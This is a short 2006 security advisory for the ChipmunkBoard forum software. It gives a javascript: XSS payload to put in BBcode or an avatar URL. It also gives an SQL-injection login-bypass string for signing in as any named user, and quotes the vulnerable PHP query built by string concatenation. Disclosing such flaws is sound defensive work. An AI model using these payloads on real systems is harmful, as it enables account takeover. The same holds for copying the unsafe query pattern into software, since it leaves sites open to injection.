ChipmunkBoard Multiple Attack vectors

Discovered by: Nomenumbra
Date: 6/4/2006
impact:high (privilege escalation,possible defacement)

It is possible to insert the following javascript in the BBcode or supply it as your avatar url:

javascript:alert(%27xss%27);

Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned off.

SQL injection is as follows (quite odd), replace whateveruser with the username you want to log in as:

a' or ('1' = '1' AND username = 'whateveruser') or  '2' = '2

The vulnerable code lies in:

$query = "select * from b_users where username='$username' and password='$password' and validated='1'"; 

Nomenumbra/[0x4F4C]